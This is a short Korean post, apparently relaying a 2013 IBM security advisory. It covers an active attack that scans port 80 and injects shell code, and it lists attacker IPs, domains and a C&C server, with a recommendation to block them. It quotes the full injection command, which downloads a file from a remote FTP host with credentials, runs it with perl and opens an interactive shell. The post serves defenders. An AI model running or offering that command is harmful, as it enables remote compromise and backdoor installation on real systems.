2013년 11월 5일 화요일

IBM 보안 연구소로부터의 긴급 조언

- 현재 IBM 보안 연구소는 72.26.194.138 로부터의 활발한 공격 징후에 대해 전세계적으로 추적 중입니다. 이 IP 주소로부터 특정 IP 대역에 대한 80 포트를 탐색하고 있으며, 연결되는 경우 바로 쉘 코드 인젝션을 시도합니다.

- 이 공격이 성공하는 경우, 공격당한 컴퓨터로부터 FTP 프로토콜을 통해 31.204.152.37 주소로 접속하여 gj.exe 파일을 다운로드 받고 실행합니다. 그리고 추가 명령을 대기하며 IRC 채널로 접속합니다.

- 현재 72.26.194.138 주소는 mail.sermonshare.com, mail.radioworship.net, web1.sermon.net와 web02.sermmonshare.com 으로 주소 변환이 되고 있고, 31.204.152.37는 mijn-site.be, jinraforest.be, faker.eu, euroveiling.com, busimatch.com 혹은 6개의 다른 도메인 주소로 해석되고 있습니다. 현재 내외부로 접속하는 주소 중 위 주소가 보인다면 잠재적으로 악성코드에 노출되었을 가능성이 있습니다.

현재 이 공격에 사용된 쉘 인젝션 코드는 다음과 같습니다.

unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT]31.204.152.37/gj.exe;perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i';\x0a$daemo

이 공격의 IRC 서버이며 C&C 서버로 추정되는 IP 주소는 83.170.75.200입니다.

- 따라서 IBM 보안 연구소에서는 72.26.194.138, 31.204.152.37와 83.170.75.200 IP 주소에 대해 방화벽 룰에서 내외부 모든 방향에 대해 차단할 것을 권고드립니다.